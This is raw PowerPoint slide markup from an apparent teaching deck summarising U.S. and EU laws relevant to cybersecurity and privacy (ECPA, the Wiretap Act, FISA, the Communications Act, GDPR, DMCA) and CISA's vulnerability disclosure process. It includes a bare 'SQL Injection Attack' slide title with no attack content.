              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247206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Electronic Communications Privacy Act of 1986 (ECPA)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2308324"/>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General Provisions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</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ECPA, as amended, protects wire, oral, and electronic communications while those communications are being made, are in transit, and when they are stored on computers. The Act applies to email, telephone conversations, and data stored electronically.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255224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954107"/>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Title III of The Omnibus Crime Control and Safe Streets Act of 1986 (Wiretap Act)</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703522"/>
            <a:ext cx="11099418" cy="3416320"/>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Background:</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Congress passed Title III in response to congressional investigations and published studies that found extensive wiretapping had been conducted by government agencies and private individuals without the consent of the parties or legal sanction. Congress found that the contents of these tapped conversations and the evidence derived from them were being used by government and private parties as evidence in court and administrative proceedings.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238781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954107"/>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Title III of The Omnibus Crime Control and Safe Streets Act of 1986 (Wiretap Act)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533257F5-E6B7-4E2C-B3E5-C9318A049C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1703522"/>
            <a:ext cx="11099418" cy="4893647"/>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Title III originally covered only "wire" and "oral" communications but was significantly revised by Title I of the ECPA in 1986 to include electronic communications. The ECPA includes two additional titles to protect the privacy of stored communications and regulate the use of "pen register" and "trap and trace" devices.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U.S. Supreme Court has held that the Fourth Amendment protection against unreasonable search and seizure extends to the interception of communications and applies to all conversations where an individual has a reasonable expectation of privacy. See Berger v. New York, 388 U.S. 41 (1967) and Katz v. United States, 389 U.S. 347 (1967).</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Title III establishes warrant procedures consistent with the Fourth Amendment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339061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954107"/>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Title III of The Omnibus Crime Control and Safe Streets Act of 1986 (Wiretap Act)</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703522"/>
            <a:ext cx="11099418" cy="3046988"/>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General Provisions:</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Title III prohibits the intentional actual or attempted:</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interception,</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use,</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disclosure, or</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"procure[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>] [of] any other person to intercept or endeavor to intercept" any wire, oral, or electronic communication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209884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954107"/>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Title III of The Omnibus Crime Control and Safe Streets Act of 1986 (Wiretap Act)</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703522"/>
            <a:ext cx="11099418" cy="3785652"/>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Exceptions:</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Act provides exceptions for operators and service providers for uses "in the normal course of his employment while engaged in any activity which is a necessary incident to the rendition of his service" and for "persons authorized by law to intercept wire, oral, or electronic communications or to conduct electronic surveillance, as defined in section 101 of the Foreign Intelligence Surveillance Act of 1978.“</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Act also prohibits the use of illegally obtained communications as evidence.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198957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Foreign Intelligence Surveillance Act of 1978 (FISA)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5262979"/>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Background:</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Like Title III of the Omnibus Crime Control and Safe Streets Act of 1968 (the "Wiretap Act"), the FISA legislation was the result of congressional investigations into Federal surveillance activities conducted in the name of national security. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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Congress sought to provide judicial and congressional oversight of foreign intelligence surveillance activities while maintaining the secrecy necessary to effectively monitor national security threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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Enacted in 1978 and sets out procedures for physical and electronic surveillance and collection of foreign intelligence information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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Initially, FISA addressed only electronic surveillance but has been significantly amended to address the use of pen registers and trap and trace devices, physical searches, and business records.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237477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Foreign Intelligence Surveillance Act of 1978 (FISA)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2308324"/>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FISA also established the United States Foreign Intelligence Surveillance Court (FISC), a special U.S. Federal court that holds nonpublic sessions to consider issuing search warrants under FISA.</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Proceedings before the FISC are ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>parte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, meaning the government is the only party present.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291163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Foreign Intelligence Surveillance Act of 1978 (FISA)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2431435"/>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General Provisions:</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FISA, as amended, establishes procedures for the authorization of electronic surveillance, use of pen registers and trap and trace devices, physical searches, and business records for the purpose of gathering foreign intelligence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3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03936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Communications Act of 1934</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2677656"/>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Background:</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Communications Act of 1934 combined and organized federal regulation of telephone, telegraph, and radio communications. The Act created the Federal Communications Commission (FCC) to oversee and regulate these industries. The Act is updated periodically to add provisions governing new communications technologies, such as broadcast, cable and satellite television.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281290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Communications Act of 1934</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785652"/>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General Provisions:</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Communications Act, as amended, is an expansive statue regulating U.S. telephone, telegraph, television, and radio communications. Its seven subchapters regulate virtually all aspects of the communications and broadcasting industry, including assignment of frequencies, rates and fees, standards, competition, terms of subscriber access, commercials, broadcasting in the public interest, government use of communications systems. The Act also provides for more detailed regulation and oversight via the establishment of the FCC.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248544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Vocabulary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273007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2677656"/>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The GDPR codifies and unifies the data privacy laws across all the EU member countries and is applicable to any citizen of the European Union and, most importantly, for any company doing business with a citizen of the EU. </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Specifically, the extended jurisdiction of the GDPR states clearly that it applies to all companies processing the personal data of subjects residing in the Union, regardless of the company's location.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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0512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415498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After more than four years of discussion and negotiation, GDPR was adopted by both the European Parliament and the European Council in April 2016.</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 underpinning regulation and directive were published at the end of that month.</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After publication of GDPR in the EU Official Journal in May 2016, it was enforceable as of May 25, 2018.</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 two-year preparation period has given businesses and public bodies covered by the regulation to prepare for the changes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241465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970318"/>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7 Major Compliance Points:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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Consent</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Breach Notification</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Right to Access</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Right to Be Forgotten</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Data Portability</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Privacy By Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Data Protection Officers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417097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108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtaining consent</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Your terms of consent must be clear. This means that you can’t stuff your terms and conditions with complex language designed to confuse your users. </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Consent must be easily given and freely withdrawn at any time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11287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108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Timely breach notification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" b="1"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If a security breach occurs, you have 72 hours to report the data breach to both your customers and any data controllers, if your company is large enough to require a GDPR data controller.</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Failure to report breaches within this timeframe will lead to fines.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330096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539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Right to data access</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If your users request their existing data profile, you must be able to serve them with a fully detailed and free electronic copy of the data you’ve collected about them.</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This report must also include the various ways you’re using their information.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37344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2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Right to be forgotten</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Also known as the right to data deletion, once the original purpose or use of the customer data has been realized, your customers have the right to request that you totally erase their personal data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="36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40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2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data portability</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This gives users rights to their own data.</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They must be able to obtain their data from you and reuse that same data in different environments outside of your company.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201154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108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Privacy by design</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This section of GDPR requires companies to design their systems with the proper security protocols in place from the start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Failure to design your systems of data collection the right way will result in a fine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410330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785652"/>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Data Protection Officers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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Enterprises will designate a Data Protection Officer (DPO) to oversee the application of the GDPR and to protect personal data from misuse and unauthorized access and other security breaches. If an enterprise meets the criteria, a designated DPO is a requirement, not an option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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 DPO is required for any enterprise with over 250 employees or for any enterprise processing the personal data of over 5,000 data subjects in any 12-month period.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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2845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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The act of securing digital information from unprivileged access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335547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General Data Protection Regulation (GDPR)</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046988"/>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Penalties for Non-Compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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 maximum assessable penalty for noncompliance with the GDPR is 4% of the annual global revenue generated by the company.</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 maximum penalty will be imposed on organizations failing to acquire sufficient customer consent to process data or for violating the Privacy by Design concept.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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11406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Digital Millennium Copyright Act of 1998 (DMCA)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970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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Signed into law by President Clinton on October 28, 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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Implements two 1996 World Intellectual Property Organization (WIPO) treaties:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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WIPO Copyright Treaty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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WIPO Performances and Phonograms Treaty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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The DMCA also addresses a number of other significant copyright-related issues.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191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Digital Millennium Copyright Act of 1998 (DMCA)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108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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Endeavors to balance the interests of internet service providers and copyright owners when copyright infringement occurs in the digital environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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Protects internet service providers from liability for copyright infringement by their users, if the internet service provider meets certain statutory requirements.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360916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Digital Millennium Copyright Act of 1998 (DMCA)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4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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To fall within the protection of the DMCA, an internet service provider must, among other things, take certain steps when it receives notice that infringing material resides on its network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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adopt and implement a policy that provides for termination in appropriate circumstances of users who are repeat infringers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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and accommodate standard technical measures that are used by copyright owners to identify and protect copyrighted works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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The DMCA protects only the internet service provider, and not the users of its system who infringe copyright.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318068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Digital Millennium Copyright Act of 1998 (DMCA)</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785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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To fall within the protection of the DMCA, an internet service provider must take certain steps when it receives notice that infringing material resides on its network</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adopt and implement a policy that provides for termination in appropriate circumstances of users who are repeat infringers</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and accommodate standard technical measures that are used by copyright owners to identify and protect copyrighted works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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The DMCA protects only the internet service provider, and not the users of its system who infringe copyright.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73805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CISA Vulnerability Disclosure Policy</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4893647"/>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Cybersecurity and Infrastructure Security Agency</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CISA will attempt to coordinate all reported cyber vulnerabilities with the affected vendor of industrial control systems or information technology products.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An appropriate timeframe for mitigation development and the type and schedule of disclosure will be determined based on the factors involved.</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Extenuating circumstances, such as active exploitation, threats of an especially serious nature, or situations that require changes to an established standard may result in earlier or later disclosure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="24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7270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CISA Vulnerability Disclosure Policy</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3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CISA vulnerability remediation process involves five basic steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="ct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Detection/Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Mitigation Coordination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Application of Mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21038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CISA Vulnerability Disclosure Policy</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4893647"/>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Detection/Collection</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CISA collects vulnerability reports in three ways:</a:t>
            </a:r>
